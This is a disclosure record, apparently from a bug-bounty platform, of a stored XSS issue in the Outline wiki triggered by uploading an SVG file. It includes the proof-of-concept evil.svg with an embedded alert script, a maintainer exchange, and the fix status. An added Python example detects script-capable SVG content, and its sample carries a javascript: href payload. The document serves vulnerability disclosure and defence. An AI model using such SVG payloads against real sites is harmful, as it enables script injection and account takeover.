XSS via SVG file in outline/outline

Valid

Reported on

Jul 1st 2022


Description

XSS via SVG file

Proof of Concept

1. Go to your account and create a document under a collection.
2. Now edit this document and upload the SVG file below into the document content as an image.

filename: evil.svg

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg" >
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert('Thais app is probably vulnerable to XSS attackss!');
   </script>
</svg>

3. After uploading, open the SVG file URL and see that the XSS is executed.

Impact

XSS to control the victim's account

We are processing your report and will contact the outline team within 24 hours. (a year ago)
ranjit-git modified the report (a year ago)
We have contacted a member of the outline team and are waiting to hear back (a year ago)
Tom Moor
a year ago

Maintainer


Scripts within SVGs are a feature of the format; it is not inherently a bug or security issue. Images are hosted on a completely separate domain without any cookies or other user data. Are you able to prove XSS to control a victim account?
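As an added defender-side example (not code from the report or from Outline), the following Python inspects an uploaded SVG for the script-capable constructs the PoC relies on and chooses response headers accordingly: a CSP that blocks inline script when the file is rendered as a document, and a forced download for files carrying active content. The sample SVGs and the header policy are assumptions of this example; the maintainer's separate, cookie-less image origin remains the primary control.

```python
import re
import xml.etree.ElementTree as ET

# Constructs that run script when an SVG is rendered as a document (opened directly or
# embedded via <object>/<iframe>); an <img> tag never executes them.
ACTIVE_TAGS = {"script", "foreignObject"}
SCRIPT_SCHEME = re.compile(r"^\s*(?:javascript|vbscript)\s*:", re.IGNORECASE)

def _local(name: str) -> str:
    """Strip the ElementTree '{namespace}' prefix from a tag or attribute name."""
    return name.rsplit("}", 1)[-1]

def find_active_content(svg_bytes: bytes) -> list[str]:
    """Return one finding per script-capable construct, in document order."""
    try:
        root = ET.fromstring(svg_bytes)
    except ET.ParseError as exc:
        return [f"unparseable XML: {exc}"]  # malformed input is treated as untrusted
    findings = []
    for el in root.iter():
        tag = _local(el.tag)
        if tag in ACTIVE_TAGS:
            findings.append(f"<{tag}> element")
        for attr, value in el.attrib.items():
            name = _local(attr).lower()
            if name.startswith("on"):  # onload, onclick, onmouseover, ...
                findings.append(f"{name} handler on <{tag}>")
            elif name == "href" and SCRIPT_SCHEME.match(value):  # href or xlink:href
                findings.append(f"script-scheme href on <{tag}>")
    return findings

def response_headers(svg_bytes: bytes) -> dict[str, str]:
    """Headers for serving an uploaded SVG (assumed policy): CSP blocks inline script when
    rendered as a document; files with active content are downloaded instead of rendered."""
    headers = {
        "Content-Type": "image/svg+xml",
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; style-src 'unsafe-inline'",
    }
    if find_active_content(svg_bytes):
        headers["Content-Disposition"] = "attachment"
    return headers

# Constructed samples (not the report's file): one shaped like the PoC, one benign.
ACTIVE_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <polygon points="0,0 0,50 50,0" fill="#009900"/>
  <script type="text/javascript">alert(1)</script>
  <a xlink:href="javascript:alert(2)"><text y="20">click</text></a>
</svg>"""
BENIGN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><circle r="5" fill="red"/></svg>'
```

Because `<img>` rendering never executes SVG script, these headers matter only for direct navigation to the upload URL, which is exactly the step the PoC uses.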

ranjit-git modified the report (a year ago)
outline/outline maintainer has acknowledged this report a year ago
Tom Moor validated this vulnerability a year ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Tom Moor marked this as fixed in 0.65.0 with commit 206545 a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE